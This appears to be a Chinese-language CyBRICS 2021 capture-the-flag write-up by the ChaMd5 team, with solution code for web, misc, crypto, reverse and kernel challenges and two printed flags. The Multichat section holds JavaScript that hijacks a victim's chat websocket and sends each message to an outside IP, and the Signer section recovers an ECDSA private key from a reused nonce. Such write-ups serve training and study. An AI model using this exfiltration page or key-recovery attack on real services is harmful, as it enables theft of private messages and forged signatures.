Web
Ad Network
按要求跟随 1337 次重定向即可,目标 url 藏在页面左上角的动图中
import requests
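def fetch_after_redirects(url, redirects=1337, timeout=10):
    """Follow the redirect chain the challenge demands and return the final body.

    requests raises TooManyRedirects once the hop count reaches
    ``max_redirects``; the limit is therefore set one above the number of
    redirects we expect (1337 hops, then the final non-redirect response), which
    is what the original hard-coded 1338 did. ``timeout`` applies per hop so a
    stalled server cannot hang the script forever.

    Args:
        url: entry point of the redirect chain.
        redirects: number of redirects the service is expected to issue.
        timeout: per-request timeout in seconds.

    Returns:
        The text body of the last response.
    """
    session = requests.session()
    session.max_redirects = redirects + 1
    try:
        response = session.get(url, timeout=timeout)
    finally:
        session.close()
    return response.text


if __name__ == "__main__":
    print(fetch_after_redirects('http://adnetwork-cybrics2021.ctf.su/adnetwork'))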
Multichat
根据题目描述,向有管理员和技术支持的私密房间内发送特定的字符串,管理员将会在私密房间内把 flag 发出来。
在题目中发现了能够提交url并让技术支持点击url的地方http://multichat-cybrics2021.ctf.su:5000/
对原有聊天室的 js 函数进行修改:页面加载后直接建立 websocket 连接并发送 `Hey, i forgot the flag. Can you remind me?`
,并在收到聊天室消息后,把消息内容通过 http 请求发送到自己的服务器上。将修改后的网页挂在自己的服务器上,此时若有人(技术支持)访问该页面,页面会直接向已连接的聊天室发送特定字符串,并把聊天室返回的内容回传到我们自己的服务器上
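function connect() {
    // Open the chat websocket, send the bait message as soon as the socket is
    // up, and forward every message the room emits to the collector host so
    // the admin's reply (the flag) is captured even though we never see the
    // victim's browser.
    if (window["WebSocket"]) {
        conn = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
        conn.onclose = function (evt) {
            var item = "";
            if (evt.code === 1003) {
                item = `Status: ${evt.reason}`;
            } else {
                item = "Connection closed.";
            }
            appendLog(item);
        };
        conn.onopen = function (evt) {
            appendLog("Connected");
            // Bait line the admin bot is expected to answer with the flag.
            conn.send("Hey, i forgot the flag. Can you remind me?");
        };
        conn.onmessage = function (evt) {
            appendLog(evt.data);
            // One XHR per message: the original reused a single `request`
            // object that is never declared in this listing, and calling
            // open() on an in-flight XMLHttpRequest aborts it, so back-to-back
            // messages could lose the one that matters. The payload is
            // URL-encoded so spaces, '&' or '#' in the chat text cannot
            // truncate or split the query string on the collector side.
            var exfil = new XMLHttpRequest();
            exfil.open('GET', 'http://120.55.164.48:1234/?a=' + encodeURIComponent(evt.data), true);
            exfil.send();
        };
    } else {
        appendLog("Your browser does not support WebSockets.");
    }
}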
window.onload = function () {
    // Page bootstrap: choose a random room id, open the websocket, and wire
    // the chat form so submitted text goes straight to the connection.
    var roomId = getRandomInt(1000, 9999999999);
    var msgInput = document.getElementById("msg");
    var logEl = document.getElementById("log");
    connect();
    document.getElementById("form").onsubmit = function () {
        var text = msgInput.value;
        // Nothing to do without a live connection or without any text.
        if (!conn || !text) {
            return false;
        }
        conn.send(text);
        sended_message = text;
        msgInput.value = "";
        return false;
    };
    document.getElementById("room").value = roomId;
}
把 url 发给技术支持点击,再查看自己服务器的访问记录即可直接拿到 flag
Misc
Scanner
游戏一共五关,通关最后一关后得到一张二维码 gif,用 PS 处理后得到
cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}
CAPTCHA The Flag
使用 stegsolve 连续查看 25 张图中隐写的验证码,输入正确后即可获得 flag
cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}
Crypto
Signer
'''
@author: badmonkey
@software: PyCharm
@file: exp.py
@time: 2021/7/25 下午1:34
'''
from pwn import *
from ecdsa import ecdsa as ec
from Crypto.Util.number import *
from hashlib import md5
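ip = "109.233.61.10"
port = 10105


def recover_nonce_and_key(r, s1, h1, s2, h2, n):
    """Recover the ECDSA nonce k and private key x from two signatures that
    reused the same nonce.

    With s_i = k^-1 (h_i + r x) mod n for both signatures, subtracting gives
    k = (h2 - h1) / (s2 - s1) and then x = (s1 k - h1) / r mod n.  Both
    signatures must carry the same r (same k implies the same kG.x); the
    caller is expected to verify that, this routine only checks what it can
    see locally.

    Args:
        r: the shared r component.
        s1, h1: s component and message hash of the first signature.
        s2, h2: s component and message hash of the second signature.
        n: order of the curve generator.

    Returns:
        (k, x) as integers reduced mod n.

    Raises:
        ValueError: if s1 == s2 (identical signatures, nothing to solve) or
            if (s2 - s1) or r is not invertible mod n.
    """
    if (s1 - s2) % n == 0:
        raise ValueError("s1 == s2: identical signatures, nonce cannot be recovered")
    k = ((h2 - h1) * pow((s2 - s1) % n, -1, n)) % n
    x = (pow(r % n, -1, n) * (k * s1 - h1)) % n
    return k, x


def fetch_signature(host, port):
    """Ask the service (menu option 1) for one signature and return (r, s, h).

    The reply is parsed with ast.literal_eval, which only accepts Python
    literals; the original eval() would have executed any code the remote
    end chose to send back.
    """
    import ast

    sh = remote(host, port)
    try:
        sh.recvuntil(b">")
        sh.sendline(b"1")
        raw = sh.recvall().strip()
    finally:
        sh.close()
    r, s, h = ast.literal_eval(raw.decode())
    return r, s, h


def main():
    """Collect two signatures, recover the key, then sign the challenge text."""
    context.log_level = "debug"
    g = ec.generator_192
    n = g.order()

    r1, s1, h1 = fetch_signature(ip, port)
    r2, s2, h2 = fetch_signature(ip, port)
    # Equal r is the evidence that the service reused k; without it the
    # arithmetic below yields a random "key" and the final signature fails.
    if r1 != r2:
        raise SystemExit("r differs between the two signatures: nonce was not reused")
    k, x = recover_nonce_and_key(r1, s1, h1, s2, h2, n)

    pub = ec.Public_key(g, g * x)
    pri = ec.Private_key(pub, x)

    sh = remote(ip, port)
    sh.recvuntil(b">")
    sh.sendline(b"2")
    # Challenge-specific: the text to sign sits at a fixed offset from the end
    # of the prompt line -- adjust the slice if the prompt format changes.
    payload = sh.recvline().strip()[-19:-2]
    m = int(md5(payload).hexdigest(), 16)
    # A fixed nonce is acceptable for this single throwaway signature.
    sig = pri.sign(m, 2333)
    sh.sendline("{},{}".format(sig.r, sig.s).encode())
    sh.interactive()


if __name__ == "__main__":
    main()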
Reverse
listing
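XOR_KEY = 0xb0b045130550cafe

# Byte tables lifted from the binary: A* are the stored bytes, B* the shuffle
# control indices that say which stored byte lands in each output position.
A1 = [0xd1, 0xd3, 0x76, 0x23, 0x35, 0x61, 0x9a, 0xab]
B1 = [0x01, 0x00, 0x03, 0x02, 0x05, 0x04, 0x07, 0x06]
A2 = [0xd5, 0xd5, 0x23, 0x27, 0x35, 0x65, 0x83, 0xf8]
B2 = [0x09, 0x08, 0x0b, 0x0a, 0x0c, 0x0d, 0x0f, 0x0e]
A3 = [0xc9, 0xd3, 0x61, 0x27, 0x33, 0x6c, 0x85, 0xb9]
B3 = [0x11, 0x10, 0x13, 0x12, 0x15, 0x14, 0x17, 0x16]
A4 = [0xd5, 0xd6, 0x22, 0x71, 0x31, 0x61, 0xcb, 0xf8]
B4 = [0x19, 0x18, 0x1b, 0x1a, 0x1c, 0x1d, 0x1f, 0x1e]


def unshuffle_xor(values, order, modulus=8, key=XOR_KEY):
    """Reorder ``values`` by ``order``, pack big-endian and XOR with ``key``.

    Each entry of ``order`` is reduced mod ``modulus`` and used as an index into
    ``values``; the picked bytes are packed most-significant-first (the first
    picked byte ends up in the top 8 bits) and the result is XORed with
    ``key``.  This is the single transformation the original script repeated
    four times with different tables and moduli.

    Args:
        values: byte values (0..255) read from the binary.
        order: control indices; ``B1`` needs no reduction but ``B2``..``B4``
            are offset by 8/16/24 and are brought back into range by
            ``modulus``.
        modulus: range reduction applied to every index.
        key: 64-bit XOR mask applied after packing.

    Returns:
        The packed-and-masked integer.
    """
    picked = [values[idx % modulus] for idx in order]
    packed = int.from_bytes(bytes(picked), "big")
    return packed ^ key


if __name__ == "__main__":
    # Printed in table order 1..4; in the listing the four 64-bit chunks are
    # laid out in memory as [rdi] = {h3, h4, h1, h2}.
    for values, order, modulus in ((A1, B1, 8), (A2, B2, 8), (A3, B3, 0x10), (A4, B4, 0x18)):
        print(hex(unshuffle_xor(values, order, modulus)))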
from typing import *
from Crypto.Util.number import long_to_bytes
# The 32 bytes the binary compares against: a1..a4 from the listing above,
# concatenated as one hex string (flipped as a whole by bigtolittle() below).
result = 'd1d3762335619aabd5d52327356583f8c9d36127336c85b9d5d622713161cbf8'
# XOR key 0xb0b045130550cafe, byte-reversed and repeated for all four 64-bit chunks.
k1 = 'feca50051345b0b0feca50051345b0b0feca50051345b0b0feca50051345b0b0'
# Shuffle control bytes b1..b4 concatenated; rev() reads the low nibble of
# each as the source-byte index within its 128-bit lane.
k2 = '010003020504070609080b0a0c0d0f0e111013121514171619181b1a1c1d1f1e'
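def bigtolittle(s):
    """Reverse the byte order of a hex string ("aabbcc" -> "ccbbaa").

    Used to flip the memory-order hex dumps into the order the bit-string
    arithmetic below expects.  The body of this function was garbled in the
    published listing (a site "expand/collapse" widget replaced the slice);
    this is the reconstruction: step two hex digits at a time and prepend.
    An odd trailing nibble is kept as a one-character chunk, matching that
    stepping.

    Args:
        s: hex string.

    Returns:
        The same hex digits with 2-character chunks in reverse order.
    """
    chunks = [s[i:i + 2] for i in range(0, len(s), 2)]
    return ''.join(reversed(chunks))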
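def rev(dest, src2):
    """Undo a per-lane byte shuffle and return the source as a 256-bit string.

    ``dest`` is the shuffled 256-bit value and ``src2`` the 32 control bytes,
    both as 64-character hex strings.  The mapping mirrors what the listing
    does (it looks like a (v)pshufb on two independent 128-bit lanes): for
    output byte ``i`` inside a lane, a control byte with its top bit set
    produces a zero byte and tells us nothing about the source; otherwise the
    low 4 bits of the control byte name the source byte in the same lane, so
    ``source[idx] = dest[i]``.

    Fixes over the original: the "top bit set" branch used a stale ``idx``
    from an earlier iteration (and, in the second lane, the wrong lane
    offset), so it could overwrite a byte that had already been recovered.
    Now such control bytes are simply skipped, and every source byte that no
    control byte selects stays ``'????????'`` so the gap is visible rather
    than silently joining as an integer 0.

    Args:
        dest: shuffled value, 64 hex chars.
        src2: control bytes, 64 hex chars.

    Returns:
        A 256-character string of '0'/'1' (or '?' for unrecovered bytes).
    """
    dest_bin = bin(int(dest, 16))[2:].zfill(256)
    src2_bin = bin(int(src2, 16))[2:].zfill(256)
    src1 = ['?' * 8] * 32
    for lane in range(2):
        lane_start = lane * 128
        ctrl_lane = src2_bin[lane_start:lane_start + 128]
        dest_lane = dest_bin[lane_start:lane_start + 128]
        for i in range(0, 128, 8):
            if ctrl_lane[i] == '1':
                continue  # zeroing control byte: carries no source information
            idx = int(ctrl_lane[i + 4:i + 8], 2)
            src1[idx + lane * 16] = dest_lane[i:i + 8]
    return ''.join(src1)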
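def main():
    """Recover the 32 input bytes the listing compares against and print them."""
    shuffled = bigtolittle(result)
    key = bigtolittle(k1)
    ctrl = bigtolittle(k2)
    src1 = rev(shuffled, ctrl)
    print(src1)
    # rev() leaves '?' for bytes no control byte selected; int(..., 2) would
    # only raise a bare ValueError, so say what actually went wrong.
    if '?' in src1:
        raise SystemExit("some source bytes were never selected by the shuffle; cannot finish")
    rdi = int(key, 16) ^ int(src1, 2)
    # Positive int -> big-endian bytes, the same thing Crypto's long_to_bytes
    # produced; stdlib so the script runs without pycryptodome.
    print(rdi.to_bytes(max(1, (rdi.bit_length() + 7) // 8), 'big'))


if __name__ == "__main__":
    main()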
kernel
ssh 连接后将相关文件 dump 下来分析,发现只要通过 ioctl 传入的值满足异或校验即可
猜测文件位于对应 dev 目录下,构建代码如下:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
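int main(void)
{
    /* Talk to the challenge driver: hand it a fixed token XORed with the
     * current epoch second and print whatever it writes back (the flag).
     * Per the write-up the driver only checks that XOR relation; the value
     * is computed immediately before the ioctl so the second is unlikely to
     * tick in between -- if it does, simply rerun. */
    int fd = open("/dev/ioctl", O_RDWR);   /* the original passed a bare 2 == O_RDWR */
    if (fd < 0) {
        perror("open /dev/ioctl");
        return 1;
    }

    char s[100] = {0};
    unsigned int val = 0x13373389;
    struct timeval begin;
    gettimeofday(&begin, NULL);
    /* tv_sec is wider than 32 bits; truncating it presumably matches the
     * driver's own unsigned-int arithmetic -- TODO confirm against the dump. */
    *(unsigned int *)s = val ^ (unsigned int)begin.tv_sec;

    if (ioctl(fd, 0x5702, s) < 0) {
        perror("ioctl 0x5702");
        close(fd);
        return 1;
    }
    s[sizeof(s) - 1] = '\0';   /* never trust the driver to NUL-terminate */
    puts(s);
    close(fd);
    return 0;
}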
编译为 elf 文件再将其 ssh 传输到对应目录下远程执行,即可获取 flag
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析 长期招新
本文始发于微信公众号(ChaMd5安全团队):CyBRICS 2021-WriteUp